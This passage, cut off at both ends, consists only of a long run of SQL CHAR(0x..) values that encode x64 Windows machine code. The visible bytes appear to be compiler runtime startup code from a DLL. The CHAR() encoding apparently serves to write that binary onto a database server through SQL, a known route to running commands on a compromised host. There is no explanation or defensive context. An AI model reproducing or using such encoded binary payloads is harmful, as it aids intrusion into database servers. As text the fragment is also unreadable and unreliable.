xfa),CHAR(0x04),CHAR(0x00),CHAR(0x00),CHAR(0xe8),CHAR(0x21),CHAR(0x05),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x8d),CHAR(0x15),CHAR(0x86),CHAR(0x1d),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x8d),CHAR(0x0d),CHAR(0x77),CHAR(0x1d),CHAR(0x00),CHAR(0x00),CHAR(0xe8),CHAR(0x10),CHAR(0x0c),CHAR(0x00),CHAR(0x00),CHAR(0x85),CHAR(0xc0),CHAR(0x75),CHAR(0x29),CHAR(0xe8),CHAR(0x5d),CHAR(0x05),CHAR(0x00),CHAR(0x00),CHAR(0x84),CHAR(0xc0),CHAR(0x74),CHAR(0x20),CHAR(0x48),CHAR(0x8d),CHAR(0x15),CHAR(0x56),CHAR(0x1d),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x8d),CHAR(0x0d),CHAR(0x47),CHAR(0x1d),CHAR(0x00),CHAR(0x00),CHAR(0xe8),CHAR(0xea),CHAR(0x0b),CHAR(0x00),CHAR(0x00),CHAR(0xc7),CHAR(0x05),CHAR(0x08),CHAR(0x32),CHAR(0x00),CHAR(0x00),CHAR(0x02),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x40),CHAR(0x32),CHAR(0xff),CHAR(0x8a),CHAR(0xcb),CHAR(0xe8),CHAR(0xd2),CHAR(0x07),CHAR(0x00),CHAR(0x00),CHAR(0x40),CHAR(0x84),CHAR(0xff),CHAR(0x75),CHAR(0x3f),CHAR(0xe8),CHAR(0x18),CHAR(0x08),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x8b),CHAR(0xd8),CHAR(0x48),CHAR(0x83),CHAR(0x38),CHAR(0x00),CHAR(0x74),CHAR(0x24),CHAR(0x48),CHAR(0x8b),CHAR(0xc8),CHAR(0xe8),CHAR(0x1f),CHAR(0x07),CHAR(0x00),CHAR(0x00),CHAR(0x84),CHAR(0xc0),CHAR(0x74),CHAR(0x18),CHAR(0x4c),CHAR(0x8b),CHAR(0xc6),CHAR(0xba),CHAR(0x02),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x49),CHAR(0x8b),CHAR(0xce),CHAR(0x48),CHAR(0x8b),CHAR(0x03),CHAR(0x4c),CHAR(0x8b),CHAR(0x0d),CHAR(0xe2),CHAR(0x1c),CHAR(0x00),CHAR(0x00),CHAR(0x41),CHAR(0xff),CHAR(0xd1),CHAR(0xff),CHAR(0x05),CHAR(0x21),CHAR(0x2c),CHAR(0x00),CHAR(0x00),CHAR(0xb8),CHAR(0x01),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0xeb),CHAR(0x02),CHAR(0x33),CHAR(0xc0),CHAR(0x48),CHAR(0x8b),CHAR(0x5c),CHAR(0x24),CHAR(0x30),CHAR(0x48),CHAR(0x8b),CHAR(0x74),CHAR(0x24),CHAR(0x38),CHAR(0x48),CHAR(0x8b),CHAR(0x7c),CHAR(0x24),CHAR(0x48),CHAR(0x48),CHAR(0x83),CHAR(0xc4),CHAR(0x20),CHAR(0x41),CHAR(0x5e),CHAR(0xc3),CHAR(0xb9),CHAR(0x07),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0xe8),CHAR(0xcc),CHAR(0x07),CHAR(0x00),CHAR(0x00),CHAR(0x90),CHAR(0xcc),CHAR(0xcc),CHAR(0xcc),CHAR(0x48),CHAR(0x89),CHAR(0x5c),CHAR(0x24),CHAR(0x08),CHAR(0x57),CHAR(0x48),CHAR(0x83),CHAR(0xec),CHAR(0x30),CHAR(0x40),CHAR(0x8a),CHAR(0xf9),CHAR(0x8b),CHAR(0x05),CHAR(0xe1),CHAR(0x2b),CHAR(0x00),CHAR(0x00),CHAR(0x85),CHAR(0xc0),CHAR(0x7f),CHAR(0x0d),CHAR(0x33),CHAR(0xc0),CHAR(0x48),CHAR(0x8b),CHAR(0x5c),CHAR(0x24),CHAR(0x40),CHAR(0x48),CHAR(0x83),CHAR(0xc4),CHAR(0x30),CHAR(0x5f),CHAR(0xc3),CHAR(0xff),CHAR(0xc8),CHAR(0x89),CHAR(0x05),CHAR(0xc8),CHAR(0x2b),CHAR(0x00),CHAR(0x00),CHAR(0xe8),CHAR(0x5b),CHAR(0x04),CHAR(0x00),CHAR(0x00),CHAR(0x8a),CHAR(0xd8),CHAR(0x88),CHAR(0x44),CHAR(0x24),CHAR(0x20),CHAR(0x83),CHAR(0x3d),CHAR(0x56),CHAR(0x31),CHAR(0x00),CHAR(0x00),CHAR(0x02),CHAR(0x75),CHAR(0x37),CHAR(0xe8),CHAR(0x6f),CHAR(0x05),CHAR(0x00),CHAR(0x00),CHAR(0xe8),CHAR(0x0a),CHAR(0x04),CHAR(0x00),CHAR(0x00),CHAR(0xe8),CHAR(0x01),CHAR(0x09),CHAR(0x00),CHAR(0x00),CHAR(0x83),CHAR(0x25),CHAR(0x3e),CHAR(0x31),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x8a),CHAR(0xcb),CHAR(0xe8),CHAR(0x0b),CHAR(0x07),CHAR(0x00),CHAR(0x00),CHAR(0x33),CHAR(0xd2),CHAR(0x40),CHAR(0x8a),CHAR(0xcf),CHAR(0xe8),CHAR(0x25),CHAR(0x07),CHAR(0x00),CHAR(0x00),CHAR(0xf6),CHAR(0xd8),CHAR(0x1b),CHAR(0xdb),CHAR(0x83),CHAR(0xe3),CHAR(0x01),CHAR(0xe8),CHAR(0x71),CHAR(0x05),CHAR(0x00),CHAR(0x00),CHAR(0x8b),CHAR(0xc3),CHAR(0xeb),CHAR(0xa2),CHAR(0xb9),CHAR(0x07),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0xe8),CHAR(0x47),CHAR(0x07),CHAR(0x00),CHAR(0x00),CHAR(0x90),CHAR(0x90),CHAR(0xcc),CHAR(0x48),CHAR(0x8b),CHAR(0xc4),CHAR(0x48),CHAR(0x89),CHAR(0x58),CHAR(0x20),CHAR(0x4c),CHAR(0x89),CHAR(0x40),CHAR(0x18),CHAR(0x89),CHAR(0x50),CHAR(0x10),CHAR(0x48),CHAR(0x89),CHAR(0x48),CHAR(0x08),CHAR(0x56),CHAR(0x57),CHAR(0x41),CHAR(0x56),CHAR(0x48),CHAR(0x83),CHAR(0xec),CHAR(0x40),CHAR(0x49),CHAR(0x8b),CHAR(0xf0),CHAR(0x8b),CHAR(0xfa),CHAR(0x4c),CHAR(0x8b),CHAR(0xf1),CHAR(0x85),CHAR(0xd2),CHAR(0x75),CHAR(0x0f),CHAR(0x39),CHAR(0x15),CHAR(0x44),CHAR(0x2b),CHAR(0x00),CHAR(0x00),CHAR(0x7f),CHAR(0x07),CHAR(0x33),CHAR(0xc0),CHAR(0xe9),CHAR(0xf0),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x8d),CHAR(0x42),CHAR(0xff),CHAR(0x83),CHAR(0xf8),CHAR(0x01),CHAR(0x77),CHAR(0x45),CHAR(0x48),CHAR(0x8b),CHAR(0x05),CHAR(0xac),CHAR(0x1f),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x85),CHAR(0xc0),CHAR(0x75),CHAR(0x0a),CHAR(0xc7),CHAR(0x44),CHAR(0x24),CHAR(0x30),CHAR(0x01),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0xeb),CHAR(0x14),CHAR(0xff),CHAR(0x15),CHAR(0xcf),CHAR(0x1b),CHAR(0x00),CHAR(0x00),CHAR(0x8b),CHAR(0xd8),CHAR(0x89),CHAR(0x44),CHAR(0x24),CHAR(0x30),CHAR(0x85),CHAR(0xc0),CHAR(0x0f),CHAR(0x84),CHAR(0xb4),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x4c),CHAR(0x8b),CHAR(0xc6),CHAR(0x8b),CHAR(0xd7),CHAR(0x49),CHAR(0x8b),CHAR(0xce),CHAR(0xe8),CHAR(0xa0),CHAR(0xfd),CHAR(0xff),CHAR(0xff),CHAR(0x8b),CHAR(0xd8),CHAR(0x89),CHAR(0x44),CHAR(0x24),CHAR(0x30),CHAR(0x85),CHAR(0xc0),CHAR(0x0f),CHAR(0x84),CHAR(0x99),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x4c),CHAR(0x8b),CHAR(0xc6),CHAR(0x8b),CHAR(0xd7),CHAR(0x49),CHAR(0x8b),CHAR(0xce),CHAR(0xe8),CHAR(0x0d),CHAR(0x03),CHAR(0x00),CHAR(0x00),CHAR(0x8b),CHAR(0xd8),CHAR(0x89),CHAR(0x44),CHAR(0x24),CHAR(0x30),CHAR(0x83),CHAR(0xff),CHAR(0x01),CHAR(0x75),CHAR(0x38),CHAR(0x85),CHAR(0xc0),CHAR(0x75),CHAR(0x7d),CHAR(0x4c),CHAR(0x8b),CHAR(0xc6),CHAR(0x33),CHAR(0xd2),CHAR(0x49),CHAR(0x8b),CHAR(0xce),CHAR(0xe8),CHAR(0xf1),CHAR(0x02),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x85),CHAR(0xf6),CHAR(0x0f),CHAR(0x95),CHAR(0xc1),CHAR(0xe8),CHAR(0xc6),CHAR(0xfe),CHAR(0xff),CHAR(0xff),CHAR(0x48),CHAR(0x8b),CHAR(0x05),CHAR(0x33),CHAR(0x1f),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x85),CHAR(0xc0),CHAR(0x74),CHAR(0x59),CHAR(0x4c),CHAR(0x8b),CHAR(0xc6),CHAR(0x33),CHAR(0xd2),CHAR(0x49),CHAR(0x8b),CHAR(0xce),CHAR(0xff),CHAR(0x15),CHAR(0x58),CHAR(0x1b),CHAR(0x00),CHAR(0x00),CHAR(0xeb),CHAR(0x49),CHAR(0x85),CHAR(0xff),CHAR(0x74),CHAR(0x05),CHAR(0x83),CHAR(0xff),CHAR(0x03),CHAR(0x75),CHAR(0x40),CHAR(0x4c),CHAR(0x8b),CHAR(0xc6),CHAR(0x8b),CHAR(0xd7),CHAR(0x49),CHAR(0x8b),CHAR(0xce),CHAR(0xe8),CHAR(0x2c),CHAR(0xfd),CHAR(0xff),CHAR(0xff),CHAR(0x8b),CHAR(0xd8),CHAR(0x89),CHAR(0x44),CHAR(0x24),CHAR(0x30),CHAR(0x85),CHAR(0xc0),CHAR(0x74),CHAR(0x29),CHAR(0x48),CHAR(0x8b),CHAR(0x05),CHAR(0xf7),CHAR(0x1e),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x85),CHAR(0xc0),CHAR(0x75),CHAR(0x09),CHAR(0x8d),CHAR(0x58),CHAR(0x01),CHAR(0x89),CHAR(0x5c),CHAR(0x24),CHAR(0x30),CHAR(0xeb),CHAR(0x14),CHAR(0x4c),CHAR(0x8b),CHAR(0xc6),CHAR(0x8b),CHAR(0xd7),CHAR(0x49),CHAR(0x8b),CHAR(0xce),CHAR(0xff),CHAR(0x15),CHAR(0x13),CHAR(0x1b),CHAR(0x00),CHAR(0x00),CHAR(0x8b),CHAR(0xd8),CHAR(0x89),CHAR(0x44),CHAR(0x24),CHAR(0x30),CHAR(0xeb),CHAR(0x06),CHAR(0x33),CHAR(0xdb),CHAR(0x89),CHAR(0x5c),CHAR(0x24),CHAR(0x30),CHAR(0x8b),CHAR(0xc3),CHAR(0x48),CHAR(0x8b),CHAR(0x5c),CHAR(0x24),CHAR(0x78),CHAR(0x48),CHAR(0x83),CHAR(0xc4),CHAR(0x40),CHAR(0x41),CHAR(0x5e),CHAR(0x5f),CHAR(0x5e),CHAR(0xc3),CHAR(0xcc),CHAR(0x48),CHAR(0x89),CHAR(0x5c),CHAR(0x24),CHAR(0x08),CHAR(0x48),CHAR(0x89),CHAR(0x74),CHAR(0x24),CHAR(0x10),CHAR(0x57),CHAR(0x48),CHAR(0x83),CHAR(0xec),CHAR(0x20),CHAR(0x49),CHAR(0x8b),CHAR(0xf8),CHAR(0x8b),CHAR(0xda),CHAR(0x48),CHAR(0x8b),CHAR(0xf1),CHAR(0x83),CHAR(0xfa),CHAR(0x01),CHAR(0x75),CHAR(0x05),CHAR(0xe8),CHAR(0x9b),CHAR(0x01),CHAR(0x00),CHAR(0x00),CHAR(0x4c),CHAR(0x8b),CHAR(0xc7),CHAR(0x8b),CHAR(0xd3),CHAR(0x48),CHAR(0x8b),CHAR(0xce),CHAR(0x48),CHAR(0x8b),CHAR(0x5c),CHAR(0x24),CHAR(0x30),CHAR(0x48),CHAR(0x8b),CHAR(0x74),CHAR(0x24),CHAR(0x38),CHAR(0x48),CHAR(0x83),CHAR(0xc4),CHAR(0x20),CHAR(0x5f),CHAR(0xe9),CHAR(0x8f),CHAR(0xfe),CHAR(0xff),CHAR(0xff),CHAR(0xcc),CHAR(0xcc),CHAR(0xcc),CHAR(0x40),CHAR(0x53),CHAR(0x48),CHAR(0x83),CHAR(0xec),CHAR(0x20),CHAR(0x48),CHAR(0x8b),CHAR(0xd9),CHAR(0x33),CHAR(0xc9),CHAR(0xff),CHAR(0x15),CHAR(0xcb),CHAR(0x19),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x8b),CHAR(0xcb),CHAR(0xff),CHAR(0x15),CHAR(0xba),CHAR(0x19),CHAR(0x00),CHAR(0x00),CHAR(0xff),CHAR(0x15),CHAR(0xc4),CHAR(0x19),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x8b),CHAR(0xc8),CHAR(0xba),CHAR(0x09),CHAR(0x04),CHAR(0x00),CHAR(0xc0),CHAR(0x48),CHAR(0x83),CHAR(0xc4),CHAR(0x20),CHAR(0x5b),CHAR(0x48),CHAR(0xff),CHAR(0x25),CHAR(0xb8),CHAR(0x19),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x89),CHAR(0x4c),CHAR(0x24),CHAR(0x08),CHAR(0x48),CHAR(0x83),CHAR(0xec),CHAR(0x38),CHAR(0xb9),CHAR(0x17),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0xe8),CHAR(0x15),CHAR(0x09),CHAR(0x00),CHAR(0x00),CHAR(0x85),CHAR(0xc0),CHAR(0x74),CHAR(0x07),CHAR(0xb9),CHAR(0x02),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0xcd),CHAR(0x29),CHAR(0x48),CHAR(0x8d),CHAR(0x0d),CHAR(0x53),CHAR(0x2a),CHAR(0x00),CHAR(0x00),CHAR(0xe8),CHAR(0xaa),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x8b),CHAR(0x44),CHAR(0x24),CHAR(0x38),CHAR(0x48),CHAR(0x89),CHAR(0x05),CHAR(0x3a),CHAR(0x2b),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x8d),CHAR(0x44),CHAR(0x24),CHAR(0x38),CHAR(0x48),CHAR(0x83),CHAR(0xc0),CHAR(0x08),CHAR(0x48),CHAR(0x89),CHAR(0x05),CHAR(0xca),CHAR(0x2a),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x8b),CHAR(0x05),CHAR(0x23),CHAR(0x2b),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x89),CHAR(0x05),CHAR(0x94),CHAR(0x29),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x8b),CHAR(0x44),CHAR(0x24),CHAR(0x40),CHAR(0x48),CHAR(0x89),CHAR(0x05),CHAR(0x98),CHAR(0x2a),CHAR(0x00),CHAR(0x00),CHAR(0xc7),CHAR(0x05),CHAR(0x6e),CHAR(0x29),CHAR(0x00),CHAR(0x00),CHAR(0x09),CHAR(0x04),CHAR(0x00),CHAR(0xc0),CHAR(0xc7),CHAR(0x05),CHAR(0x68),CHAR(0x29),CHAR(0x00),CHAR(0x00),CHAR(0x01),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0xc7),CHAR(0x05),CHAR(0x72),CHAR(0x29),CHAR(0x00),CHAR(0x00),CHAR(0x01),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0xb8),CHAR(0x08),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x6b),CHAR(0xc0),CHAR(0x00),CHAR(0x48),CHAR(0x8d),CHAR(0x0d),CHAR(0x6a),CHAR(0x29),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0xc7),CHAR(0x04),CHAR(0x01),CHAR(0x02),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0xb8),CHAR(0x08),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x6b),CHAR(0xc0),CHAR(0x00),CHAR(0x48),CHAR(0x8b),CHAR(0x0d),CHAR(0xea),CHAR(0x28),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x89),CHAR(0x4c),CHAR(0x04),CHAR(0x20),CHAR(0xb8),CHAR(0x08),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x6b),CHAR(0xc0),CHAR(0x01),CHAR(0x48),CHAR(0x8b),CHAR(0x0d),CHAR(0xcd),CHAR(0x28),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x89),CHAR(0x4c),CHAR(0x04),CHAR(0x20),CHAR(0x48),CHAR(0x8d),CHAR(0x0d),CHAR(0x89),CHAR(0x1d),CHAR(0x00),CHAR(0x00),CHAR(0xe8),CHAR(0x00),CHAR(0xff),CHAR(0xff),CHAR(0xff),CHAR(0x48),CHAR(0x83),CHAR(0xc4),CHAR(0x38),CHAR(0xc3),CHAR(0xcc),CHAR(0xcc),CHAR(0xcc),CHAR(0x40),CHAR(0x53),CHAR(0x56),CHAR(0x57),CHAR(0x48),CHAR(0x83),CHAR(0xec),CHAR(0x40),CHAR(0x48),CHAR(0x8b),CHAR(0xd9),CHAR(0xff),CHAR(0x15),CHAR(0xa3),CHAR(0x18),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x8b),CHAR(0xb3),CHAR(0xf8),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x33),CHAR(0xff),CHAR(0x45),CHAR(0x33),CHAR(0xc0),CHAR(0x48),CHAR(0x8d),CHAR(0x54),CHAR(0x24),CHAR(0x60),CHAR(0x48),CHAR(0x8b),CHAR(0xce),CHAR(0xff),CHAR(0x15),CHAR(0x91),CHAR(0x18),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x85),CHAR(0xc0),CHAR(0x74),CHAR(0x39),CHAR(0x48),CHAR(0x83),CHAR(0x64),CHAR(0x24),CHAR(0x38),CHAR(0x00),CHAR(0x48),CHAR(0x8d),CHAR(0x4c),CHAR(0x24),CHAR(0x68),CHAR(0x48),CHAR(0x8b),CHAR(0x54),CHAR(0x24),CHAR(0x60),CHAR(0x4c),CHAR(0x8b),CHAR(0xc8),CHAR(0x48),CHAR(0x89),CHAR(0x4c),CHAR(0x24),CHAR(0x30),CHAR(0x4c),CHAR(0x8b),CHAR(0xc6),CHAR(0x48),CHAR(0x8d),CHAR(0x4c),CHAR(0x24),CHAR(0x70),CHAR(0x48),CHAR(0x89),CHAR(0x4c),CHAR(0x24),CHAR(0x28),CHAR(0x33),CHAR(0xc9),CHAR(0x48),CHAR(0x89),CHAR(0x5c),CHAR(0x24),CHAR(0x20),CHAR(0xff),CHAR(0x15),CHAR(0x62),CHAR(0x18),CHAR(0x00),CHAR(0x00),CHAR(0xff),CHAR(0xc7),CHAR(0x83),CHAR(0xff),CHAR(0x02),CHAR(0x7c),CHAR(0xb1),CHAR(0x48),CHAR(0x83),CHAR(0xc4),CHAR(0x40),CHAR(0x5f),CHAR(0x5e),CHAR(0x5b),CHAR(0xc3),CHAR(0xcc),CHAR(0xcc),CHAR(0xcc),CHAR(0x48),CHAR(0x89),CHAR(0x5c),CHAR(0x24),CHAR(0x20),CHAR(0x55),CHAR(0x48),CHAR(0x8b),CHAR(0xec),CHAR(0x48),CHAR(0x83),CHAR(0xec),CHAR(0x20),CHAR(0x48),CHAR(0x8b),CHAR(0x05),CHAR(0x34),CHAR(0x28),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0xbb),CHAR(0x32),CHAR(0xa2),CHAR(0xdf),CHAR(0x2d),CHAR(0x99),CHAR(0x2b),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x3b),CHAR(0xc3),CHAR(0x75),CHAR(0x74),CHAR(0x48),CHAR(0x83),CHAR(0x65),CHAR(0x18),CHAR(0x00),CHAR(0x48),CHAR(0x8d),CHAR(0x4d),CHAR(0x18),CHAR(0xff),CHAR(0x15),CHAR(0x66),CHAR(0x18),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x8b),CHAR(0x45),CHAR(0x18),CHAR(0x48),CHAR(0x89),CHAR(0x45),CHAR(0x10),CHAR(0xff),CHAR(0x15),CHAR(0x50),CHAR(0x18),CHAR(0x00),CHAR(0x00),CHAR(0x8b),CHAR(0xc0),CHAR(0x48),CHAR(0x31),CHAR(0x45),CHAR(0x10),CHAR(0xff),CHAR(0x15),CHAR(0x3c),CHAR(0x18),CHAR(0x00),CHAR(0x00),CHAR(0x8b),CHAR(0xc0),CHAR(0x48),CHAR(0x8d),CHAR(0x4d),CHAR(0x20),CHAR(0x48),CHAR(0x31),CHAR(0x45),CHAR(0x10),CHAR(0xff),CHAR(0x15),CHAR(0x24),CHAR(0x18),CHAR(0x00),CHAR(0x00),CHAR(0x8b),CHAR(0x45),CHAR(0x20),CHAR(0x48),CHAR(0x8d),CHAR(0x4d),CHAR(0x10),CHAR(0x48),CHAR(0xc1),CHAR(0xe0),CHAR(0x20),CHAR(0x48),CHAR(0x33),CHAR(0x45),CHAR(0x20),CHAR(0x48),CHAR(0x33),CHAR(0x45),CHAR(0x10),CHAR(0x48),CHAR(0x33),CHAR(0xc1),CHAR(0x48),CHAR(0xb9),CHAR(0xff),CHAR(0xff),CHAR(0xff),CHAR(0xff),CHAR(0xff),CHAR(0xff),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x23),CHAR(0xc1),CHAR(0x48),CHAR(0xb9),CHAR(0x33),CHAR(0xa2),CHAR(0xdf),CHAR(0x2d),CHAR(0x99),CHAR(0x2b),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x3b),CHAR(0xc3),CHAR(0x48),CHAR(0x0f),CHAR(0x44),CHAR(0xc1),CHAR(0x48),CHAR(0x89),CHAR(0x05),CHAR(0xb1),CHAR(0x27),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x8b),CHAR(0x5c),CHAR(0x24),CHAR(0x48),CHAR(0x48),CHAR(0xf7),CHAR(0xd0),CHAR(0x48),CHAR(0x89),CHAR(0x05),CHAR(0x9a),CHAR(0x27),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x83),CHAR(0xc4),CHAR(0x20),CHAR(0x5d),CHAR(0xc3),CHAR(0x48),CHAR(0x83),CHAR(0xec),CHAR(0x28),CHAR(0x83),CHAR(0xfa),CHAR(0x01),CHAR(0x75),CHAR(0x10),CHAR(0x48),CHAR(0x83),CHAR(0x3d),CHAR(0x43),CHAR(0x1c),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x75),CHAR(0x06),CHAR(0xff),CHAR(0x15),CHAR(0xdb),CHAR(0x17),CHAR(0x00),CHAR(0x00),CHAR(0xb8),CHAR(0x01),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x83),CHAR(0xc4),CHAR(0x28),CHAR(0xc3),CHAR(0xcc),CHAR(0x48),CHAR(0x8d),CHAR(0x0d),CHAR(0x29),CHAR(0x2d),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0xff),CHAR(0x25),CHAR(0xca),CHAR(0x17),CHAR(0x00),CHAR(0x00),CHAR(0xcc),CHAR(0xcc),CHAR(0x48),CHAR(0x8d),CHAR(0x0d),CHAR(0x19),CHAR(0x2d),CHAR(0x00),CHAR(0x00),CHAR(0xe9),CHAR(0x00),CHAR(0x07),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x8d),CHAR(0x05),CHAR(0x1d),CHAR(0x2d),CHAR(0x00),CHAR(0x00),CHAR(0xc3),CHAR(0x48),CHAR(0x8d),CHAR(0x05),CHAR(0x1d),CHAR(0x2d),CHAR(0x00),CHAR(0x00),CHAR(0xc3),CHAR(0x48),CHAR(0x83),CHAR(0xec),CHAR(0x28),CHAR(0xe8),CHAR(0xe7),CHAR(0xff),CHAR(0xff),CHAR(0xff),CHAR(0x48),CHAR(0x83),CHAR(0x08),CHAR(0x24),CHAR(0xe8),CHAR(0xe6),CHAR(0xff),CHAR(0xff),CHAR(0xff),CHAR(0x48),CHAR(0x83),CHAR(0x08),CHAR(0x02),CHAR(0x48),CHAR(0x83),CHAR(0xc4),CHAR(0x28),CHAR(0xc3),CHAR(0xcc),CHAR(0x48),CHAR(0x83),CHAR(0xec),CHAR(0x28),CHAR(0xe8),CHAR(0xa7),CHAR(0x06),CHAR(0x00),CHAR(0x00),CHAR(0x85),CHAR(0xc0),CHAR(0x74),CHAR(0x21),CHAR(0x65),CHAR(0x48),CHAR(0x8b),CHAR(0x04),CHAR(0x25),CHAR(0x30),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x8b),CHAR(0x48),CHAR(0x08),CHAR(0xeb),CHAR(0x05),CHAR(0x48),CHAR(0x3b),CHAR(0xc8),CHAR(0x74),CHAR(0x14),CHAR(0x33),CHAR(0xc0),CHAR(0xf0),CHAR(0x48),CHAR(0x0f),CHAR(0xb1),CHAR(0x0d),CHAR(0xe4),CHAR(0x2c),CHAR(0x00),CHAR(0x00),CHAR(0x75),CHAR(0xee),CHAR(0x32),CHAR(0xc0),CHAR(0x48),CHAR(0x83),CHAR(0xc4),CHAR(0x28),CHAR(0xc3),CHAR(0xb0),CHAR(0x01),CHAR(0xeb),CHAR(0xf7),CHAR(0xcc),CHAR(0xcc),CHAR(0xcc),CHAR(0x48),CHAR(0x83),CHAR(0xec),CHAR(0x28),CHAR(0xe8),CHAR(0x6b),CHAR(0x06),CHAR(0x00),CHAR(0x00),CHAR(0x85),CHAR(0xc0),CHAR(0x74),CHAR(0x07),CHAR(0xe8),CHAR(0xb6),CHAR(0x04),CHAR(0x00),CHAR(0x00),CHAR(0xeb),CHAR(0x19),CHAR(0xe8),CHAR(0x53),CHAR(0x06),CHAR(0x00),CHAR(0x00),CHAR(0x8b),CHAR(0xc8),CHAR(0xe8),CHAR(0x96),CHAR(0x06),CHAR(0x00),CHAR(0x00),CHAR(0x85),CHAR(0xc0),CHAR(0x74),CHAR(0x04),CHAR(0x32),CHAR(0xc0),CHAR(0xeb),CHAR(0x07),CHAR(0xe8),CHAR(0x8f),CHAR(0x06),CHAR(0x00),CHAR(0x00),CHAR(0xb0),CHAR(0x01),CHAR(0x48),CHAR(0x83),CHAR(0xc4),CHAR(0x28),CHAR(0xc3),CHAR(0x48),CHAR(0x83),CHAR(0xec),CHAR(0x28),CHAR(0x33),CHAR(0xc9),CHAR(0xe8),CHAR(0x3d),CHAR(0x01),CHAR(0x00),CHAR(0x00),CHAR(0x84),CHAR(0xc0),CHAR(0x0f),CHAR(0x95),CHAR(0xc0),CHAR(0x48),CHAR(0x83),CHAR(0xc4),CHAR(0x28),CHAR(0xc3),CHAR(0xcc),CHAR(0xcc),CHAR(0xcc),CHAR(0x48),CHAR(0x83),CHAR(0xec),CHAR(0x28),CHAR(0xe8),CHAR(0x7f),CHAR(0x06),CHAR(0x00),CHAR(0x00),CHAR(0x84),CHAR(0xc0),CHAR(0x75),CHAR(0x04),CHAR(0x32),CHAR(0xc0),CHAR(0xeb),CHAR(0x12),CHAR(0xe8),CHAR(0x72),CHAR(0x06),CHAR(0x00),CHAR(0x00),CHAR(0x84),CHAR(0xc0),CHAR(0x75),CHAR(0x07),CHAR(0xe8),CHAR(0x69),CHAR(0x06),CHAR(0x00),CHAR(0x00),CHAR(0xeb),CHAR(0xec),CHAR(0xb0),CHAR(0x01),CHAR(0x48),CHAR(0x83),CHAR(0xc4),CHAR(0x28),CHAR(0xc3),CHAR(0x48),CHAR(0x83),CHAR(0xec),CHAR(0x28),CHAR(0xe8),CHAR(0x57),CHAR(0x06),CHAR(0x00),CHAR(0x00),CHAR(0xe8),CHAR(0x52),CHAR(0x06),CHAR(0x00),CHAR(0x00),CHAR(0xb0),CHAR(0x01),CHAR(0x48),CHAR(0x83),CHAR(0xc4),CHAR(0x28),CHAR(0xc3),CHAR(0xcc),CHAR(0xcc),CHAR(0xcc),CHAR(0x48),CHAR(0x89),CHAR(0x5c),CHAR(0x24),CHAR(0x08),CHAR(0x48),CHAR(0x89),CHAR(0x6c),CHAR(0x24),CHAR(0x10),CHAR(0x48),CHAR(0x89),CHAR(0x74),CHAR(0x24),CHAR(0x18),CHAR(0x57),CHAR(0x48),CHAR(0x83),CHAR(0xec),CHAR(0x20),CHAR(0x49),CHAR(0x8b),CHAR(0xf9),CHAR(0x49),CHAR(0x8b),CHAR(0xf0),CHAR(0x8b),CHAR(0xda),CHAR(0x48),CHAR(0x8b),CHAR(0xe9),CHAR(0xe8),CHAR(0xc4),CHAR(0x05),CHAR(0x00),CHAR(0x00),CHAR(0x85),CHAR(0xc0),CHAR(0x75),CHAR(0x16),CHAR(0x83),CHAR(0xfb),CHAR(0x01),CHAR(0x75),CHAR(0x11),CHAR(0x4c),CHAR(0x8b),CHAR(0xc6),CHAR(0x33),CHAR(0xd2),CHAR(0x48),CHAR(0x8b),CHAR(0xcd),CHAR(0x48),CHAR(0x8b),CHAR(0xc7),CHAR(0xff),CHAR(0x